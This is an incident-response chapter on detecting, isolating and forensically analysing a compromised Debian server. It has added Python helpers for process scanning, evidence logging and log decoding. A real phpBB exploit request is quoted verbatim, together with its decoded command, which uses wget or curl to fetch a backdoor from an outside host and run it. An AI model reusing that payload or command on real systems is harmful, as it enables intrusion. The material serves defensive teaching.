
14.7. Dealing with a Compromised Machine

Despite the best intentions and however carefully designed the security policy, an administrator eventually faces an act of hijacking. This section provides a few guidelines on how to react when confronted with these unfortunate circumstances.

14.7.1. Detecting and Seeing the Cracker's Intrusion

The first step of reacting to cracking is to be aware of such an act. This is not self-evident, especially without adequate monitoring infrastructure.
Cracking acts are often not detected until they have direct consequences on the legitimate services hosted on the machine, such as connections slowing down, some users being unable to connect, or any other kind of malfunction. Faced with these problems, the administrator needs to have a good look at the machine and carefully scrutinize what misbehaves. This is usually the time when they discover an unusual process, for instance, one named apache instead of the standard /usr/sbin/apache2. If we follow that example, the thing to do is to note its process identifier, and check /proc/pid/exe to see what program this process is currently running:
# ls -al /proc/3719/exe
lrwxrwxrwx 1 www-data www-data 0 2007-04-20 16:19 /proc/3719/exe -> /var/tmp/.bash_httpd/psybnc
A program installed under /var/tmp/, and running as a web server? No doubt left, the machine is compromised.
This is only one example, but many other hints can ring the administrator's bell:
  • a command that suddenly shows errors like segmentation faults;
  • a program that utilizes all CPU cores or memory;
  • an option to a command that no longer works; the version of the software that the command claims to be does not match the version that is supposed to be installed according to dpkg;
  • a command prompt or a session greeting indicating that the last connection came from an unknown server on another continent;
  • the /tmp/ partition was found to be full, and it turned out to be full of illegal copies of movies;
  • and so on.
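The /proc/pid/exe inspection above can be automated. The following is an added example, not code from the handbook: it reads each process's exe link and comm name and flags binaries running from scratch or hidden directories, executables deleted after start, and process names that do not match their binary (the directory list and the name-matching heuristic are assumptions, so treat hits as leads, not proof).

```python
import os

# Scratch directories an attacker often drops binaries into; constructed list,
# extend it for your environment.
SUSPECT_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def classify_process(exe_target, comm):
    """Return the reasons a process looks suspicious ([] means nothing found).

    exe_target: what /proc/<pid>/exe points to (os.readlink result)
    comm:       the kernel's name for the process (/proc/<pid>/comm)
    """
    reasons = []
    if exe_target.startswith(SUSPECT_DIRS) or "/." in exe_target:
        reasons.append("binary lives in a scratch or hidden directory")
    if exe_target.endswith(" (deleted)"):
        reasons.append("binary was unlinked after the process started")
    # Heuristic: the kernel truncates comm to 15 characters, so compare
    # prefixes; interpreters and multi-call binaries can cause false hits.
    base = os.path.basename(exe_target.replace(" (deleted)", ""))
    if not base.startswith(comm[:15]) and not comm.startswith(base[:15]):
        reasons.append("process name %r does not match binary %r" % (comm, base))
    return reasons


def scan_proc(proc_root="/proc"):
    """Walk proc_root and map pid -> reasons for every process that is flagged."""
    findings = {}
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        pid_dir = os.path.join(proc_root, entry)
        try:
            exe = os.readlink(os.path.join(pid_dir, "exe"))
            with open(os.path.join(pid_dir, "comm")) as f:
                comm = f.read().strip()
        except OSError:
            continue  # kernel thread, vanished process, or insufficient rights
        reasons = classify_process(exe, comm)
        if reasons:
            findings[int(entry)] = reasons
    return findings


if __name__ == "__main__":
    for pid, reasons in sorted(scan_proc().items()):
        print("pid %d: %s" % (pid, "; ".join(reasons)))
```

Run as root so every process's exe link is readable; the psybnc case from the text is flagged twice, once for its location and once for the name mismatch.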

14.7.2. Putting the Server Off-Line

In all but the very special cases, the cracking comes from the network, and the attacker needs a working network to reach their targets (read confidential data, share illegal files, hide their identity by using the machine as a relay, and so on). Unplugging the computer from the network will prevent the attacker from reaching these targets, if they haven't managed to do so yet.
This may only be possible if the server is physically accessible. When the server is hosted in a hosting provider's data center halfway across the country, or if the server is not accessible for any other reason, it is usually a good idea to start by gathering some important information (see Section 14.7.3, “Keeping Everything that Could Be Used as Evidence”, Section 14.7.5, “Forensic Analysis” and Section 14.7.6, “Reconstituting the Attack Scenario”), then isolating that server as much as possible by shutting down as many services as possible (usually, everything but sshd). This case is still awkward, since one can't rule out the possibility of the attacker having SSH access like the administrator has; this makes it harder to “clean” the machines. If possible, and if the provider supports it, the server can be put offline and accessed through the provider's KVM/IPMI interface or their rescue console. If the affected machine is a virtual machine, a snapshot should be taken immediately to secure evidence.

14.7.3. Keeping Everything that Could Be Used as Evidence

Understanding the attack and/or engaging legal action against the attackers requires taking copies of all the important elements; this includes the contents of the hard disk, a list of all running processes, and a list of all open connections. The contents of the RAM could also be used, but it is rarely used in practice.
In the heat of action, administrators are often tempted to perform many checks on the compromised machine; this is usually not a good idea. Every command is potentially subverted and can erase pieces of evidence. The checks should be restricted to the minimal set (netstat -tupan for network connections, ps auxf for a list of processes, ls -alR /proc/[0-9]* for a little more information on running programs), and every performed check should carefully be written down.
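Writing every check down can be automated rather than left to memory. The following is an added example, not code from the handbook: it runs the minimal set of commands named above, keeps each raw output, and journals the timestamp, exact command line, exit status and output hash. File names and the log layout are assumptions; the evidence directory should be on removable media or a network mount, not on the compromised disk.

```python
import glob
import hashlib
import os
import subprocess
import time

# The minimal set of checks named in the text; the glob replaces the shell's
# expansion of /proc/[0-9]*.
MINIMAL_CHECKS = [
    ["netstat", "-tupan"],
    ["ps", "auxf"],
    ["ls", "-alR"] + sorted(glob.glob("/proc/[0-9]*")),
]


def record_check(evidence_dir, argv):
    """Run one command, keep its raw output, and append to checks.log the UTC
    timestamp, the command line, the exit status, the output file name and the
    SHA-256 of the output.  Returns that digest (assumed layout)."""
    os.makedirs(evidence_dir, exist_ok=True)
    stamp = time.strftime("%Y%m%dT%H%M%SZ", time.gmtime())
    out_name = "%s_%s.txt" % (stamp, os.path.basename(argv[0]))
    try:
        proc = subprocess.run(argv, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
        output, status = proc.stdout, proc.returncode
    except FileNotFoundError:
        output, status = b"", -1  # tool absent on this system; still journaled
    with open(os.path.join(evidence_dir, out_name), "wb") as f:
        f.write(output)
    digest = hashlib.sha256(output).hexdigest()
    with open(os.path.join(evidence_dir, "checks.log"), "a") as log:
        # The command line is truncated so the /proc glob's huge argument
        # list does not swamp the journal; the full output is in out_name.
        log.write("%s\t%s\texit=%d\t%s\t%s\n" % (
            stamp, " ".join(argv)[:200], status, out_name, digest))
    return digest


def read_log(evidence_dir):
    """Return the entries of checks.log as a list of strings."""
    with open(os.path.join(evidence_dir, "checks.log")) as log:
        return [line.rstrip("\n") for line in log]


def collect_minimal_evidence(evidence_dir):
    """Run every check in MINIMAL_CHECKS; map each command to its output digest."""
    return {" ".join(argv)[:40]: record_check(evidence_dir, argv)
            for argv in MINIMAL_CHECKS}
```

The commands themselves may still be subverted, as the text warns; the journal only proves what was run and what it returned.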
Once the “dynamic” elements have been saved, the next step is to store a complete image of the hard-disk. Making such an image is impossible if the filesystem is still evolving, which is why it must be remounted read-only. The simplest solution is often to halt the server brutally (after running sync) and reboot it on a rescue CD. Each partition should be copied with a tool such as dd; these images can be sent to another server (possibly with the very convenient nc tool). Another possibility may be even simpler: just get the disk out of the machine and replace it with a new one that can be reformatted and reinstalled. Most server providers offer a so-called rescue-console that essentially provides the same functionality as a rescue CD.

14.7.4. Re-installing

The server should not be brought back on line without a complete reinstallation. If the compromise was severe (if administrative privileges were obtained), there is almost no other way to be sure that we get rid of everything the attacker may have left behind (particularly backdoors). Of course, all the latest security updates must also be applied so as to plug the vulnerability used by the attacker. Ideally, analyzing the attack should point at this attack vector, so one can be sure of actually fixing it; otherwise, one can only hope that the vulnerability was one of those fixed by the updates.
Reinstalling a remote server is not always easy; it may involve assistance from the hosting company, because not all such companies provide automated reinstallation systems or remote consoles (although these cases should be rare). Care should be taken not to reinstall the machine from backups taken later than the compromise. Ideally, only data should be restored, the actual software should be reinstalled from the installation media.

14.7.5. Forensic Analysis

Now that the service has been restored, it is time to have a closer look at the disk images of the compromised system in order to understand the attack vector. When mounting these images, care should be taken to use the ro,nodev,noexec,noatime options so as to avoid changing the contents (including timestamps of access to files) or running compromised programs by mistake.
Retracing an attack scenario usually involves looking for everything that was modified and executed:
  • .bash_history files often provide for a very interesting read;
  • so does listing files that were recently created, modified or accessed;
  • the strings command helps identifying programs installed by the attacker, by extracting text strings from a binary;
  • the log files in /var/log/ often allow reconstructing a chronology of events;
  • comparing the system to the last known uncompromised backup can quickly reveal the changes left by the attacker, e.g. files added, changed, or deleted;
  • special-purpose tools also allow restoring the contents of potentially deleted files, including log files that attackers often delete.
Some of these operations can be made easier with specialized software. In particular, the sleuthkit package provides many tools to analyze a filesystem. Their use is made easier by the Autopsy Forensic Browser graphical interface (in the autopsy package). Some Linux distributions have a "live install" image and contain many programs for forensic analysis, such as Kali Linux (see Section A.8, “Kali Linux”), with its forensic mode, BlackArchLinux, and the commercial Grml-Forensic, based on Grml (see Section A.6, “Grml”).

14.7.6. Reconstituting the Attack Scenario

All the elements collected during the analysis should fit together like pieces in a jigsaw puzzle; the creation of the first suspect files is often correlated with logs proving the breach. A real-world example should be more explicit than long theoretical ramblings.
The following log is an extract from an Apache access.log:
www.falcot.com 200.58.141.84 - - [27/Nov/2004:13:33:34 +0100] "GET /phpbb/viewtopic.php?t=10&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(32)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(103)%252echr(97)%252echr(98)%252echr(114)%252echr(121)%252echr(107)%252echr(46)%252echr(97)%252echr(108)%252echr(116)%252echr(101)%252echr(114)%252echr(118)%252echr(105)%252echr(115)%252echr(116)%252echr(97)%252echr(46)%252echr(111)%252echr(114)%252echr(103)%252echr(47)%252echr(98)%252echr(100)%252echr(32)%252echr(124)%252echr(124)%252echr(32)%252echr(99)%252echr(117)%252echr(114)%252echr(108)%252echr(32)%252echr(103)%252echr(97)%252echr(98)%252echr(114)%252echr(121)%252echr(107)%252echr(46)%252echr(97)%252echr(108)%252echr(116)%252echr(101)%252echr(114)%252echr(118)%252echr(105)%252echr(115)%252echr(116)%252echr(97)%252echr(46)%252echr(111)%252echr(114)%252echr(103)%252echr(47)%252echr(98)%252echr(100)%252echr(32)%252echr(45)%252echr(111)%252echr(32)%252echr(98)%252echr(100)%252echr(59)%252echr(32)%252echr(99)%252echr(104)%252echr(109)%252echr(111)%252echr(100)%252echr(32)%252echr(43)%252echr(120)%252echr(32)%252echr(98)%252echr(100)%252echr(59)%252echr(32)%252echr(46)%252echr(47)%252echr(98)%252echr(100)%252echr(32)%252echr(38))%252e%2527 HTTP/1.1" 200 27969 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
This example matches exploitation of an old security vulnerability in phpBB.
Decoding this long URL leads to understanding that the attacker managed to run some PHP code, namely: system("cd /tmp; wget gabryk.altervista.org/bd || curl gabryk.altervista.org/bd -o bd; chmod +x bd; ./bd &"). Indeed, a bd file was found in /tmp/. Running strings /mnt/tmp/bd returns, among other strings, PsychoPhobia Backdoor is starting.... This really looks like a backdoor.
Some time later, this access was used to download, install and run an IRC bot that connected to an underground IRC network. The bot could then be controlled via this protocol and instructed to download files for sharing. This program even has its own log file:
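The decoding step just described can be done mechanically when sifting a large access.log. The following is an added example, not code from the handbook: it double-URL-decodes the highlight parameter, reassembles whatever a PHP chr() chain builds, and reports the client IP for every request that decodes to PHP code. Run over the log line quoted above it yields exactly the system() argument given in the text; the regular expressions, the function names and the assumed log layout (virtual host first, client IP second) are the example's own.

```python
import re
from urllib.parse import unquote

# The access.log line quoted in the text, kept verbatim as sample input.
LOG_LINE = (
    'www.falcot.com 200.58.141.84 - - [27/Nov/2004:13:33:34 +0100] "GET '
    '/phpbb/viewtopic.php?t=10&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(32)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(103)%252echr(97)%252echr(98)%252echr(114)%252echr(121)%252echr(107)%252echr(46)%252echr(97)%252echr(108)%252echr(116)%252echr(101)%252echr(114)%252echr(118)%252echr(105)%252echr(115)%252echr(116)%252echr(97)%252echr(46)%252echr(111)%252echr(114)%252echr(103)%252echr(47)%252echr(98)%252echr(100)%252echr(32)%252echr(124)%252echr(124)%252echr(32)%252echr(99)%252echr(117)%252echr(114)%252echr(108)%252echr(32)%252echr(103)%252echr(97)%252echr(98)%252echr(114)%252echr(121)%252echr(107)%252echr(46)%252echr(97)%252echr(108)%252echr(116)%252echr(101)%252echr(114)%252echr(118)%252echr(105)%252echr(115)%252echr(116)%252echr(97)%252echr(46)%252echr(111)%252echr(114)%252echr(103)%252echr(47)%252echr(98)%252echr(100)%252echr(32)%252echr(45)%252echr(111)%252echr(32)%252echr(98)%252echr(100)%252echr(59)%252echr(32)%252echr(99)%252echr(104)%252echr(109)%252echr(111)%252echr(100)%252echr(32)%252echr(43)%252echr(120)%252echr(32)%252echr(98)%252echr(100)%252echr(59)%252echr(32)%252echr(46)%252echr(47)%252echr(98)%252echr(100)%252echr(32)%252echr(38))%252e%2527 HTTP/1.1" 200 27969 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"'
)

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
CHR_RE = re.compile(r"chr\((\d+)\)")


def decode_highlight(request_path):
    """Double-URL-decode the highlight parameter and rebuild the string a PHP
    chr() chain assembles.  Returns (decoded_php, assembled_string)."""
    query = request_path.partition("?")[2]
    params = dict(p.split("=", 1) for p in query.split("&") if "=" in p)
    # The payload was encoded twice: %2527 -> %27 -> '   and   %252e -> %2e -> .
    php = unquote(unquote(params.get("highlight", "")))
    assembled = "".join(chr(int(n)) for n in CHR_RE.findall(php))
    return php, assembled


def injected_commands(log_lines):
    """Return (client_ip, assembled_string) for each request whose highlight
    parameter decodes to PHP code, the pattern of the breach in the text.
    Assumes the vhost-first log layout shown: field 1 is the client IP."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        php, assembled = decode_highlight(m.group(1))
        if "system(" in php or "chr(" in php:
            hits.append((line.split()[1], assembled))
    return hits


if __name__ == "__main__":
    for ip, cmd in injected_commands([LOG_LINE]):
        print("%s ran: %s" % (ip, cmd))
```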
** 2004-11-29-19:50:15: NOTICE: :GAB!sex@Rizon-2EDFBC28.pool8250.interbusiness.it NOTICE ReV|DivXNeW|504 :DCC Chat (82.50.72.202)
** 2004-11-29-19:50:15: DCC CHAT attempt authorized from GAB!SEX@RIZON-2EDFBC28.POOL8250.INTERBUSINESS.IT
** 2004-11-29-19:50:15: DCC CHAT received from GAB, attempting connection to 82.50.72.202:1024
** 2004-11-29-19:50:15: DCC CHAT connection suceeded, authenticating
** 2004-11-29-19:50:20: DCC CHAT Correct password
(...)
** 2004-11-29-19:50:49: DCC Send Accepted from ReV|DivXNeW|502: In.Ostaggio-iTa.Oper_-DvdScr.avi (713034KB)
(...)
** 2004-11-29-20:10:11: DCC Send Accepted from GAB: La_tela_dell_assassino.avi (666615KB)
(...)
** 2004-11-29-21:10:36: DCC Upload: Transfer Completed (666615 KB, 1 hr 24 sec, 183.9 KB/sec)
(...)
** 2004-11-29-22:18:57: DCC Upload: Transfer Completed (713034 KB, 2 hr 28 min 7 sec, 80.2 KB/sec)
These traces show that two video files were stored on the server.
In parallel, the attacker also downloaded a pair of extra files, /tmp/pt and /tmp/loginx. Running them through strings leads to strings such as Shellcode placed at 0x%08lx and Now wait for suid shell.... These look like programs exploiting local vulnerabilities to obtain administrative privileges. Did they reach their target? In this case, apparently not, since no files appear to have been modified after their activity began.
In this example, the entire intrusion has been reconstructed, and it can be deduced that the attacker was able to take advantage of the compromised system for about three days. But the most important thing here is that the vulnerability has been identified, and the administrator can be sure that the new installation really does fix it.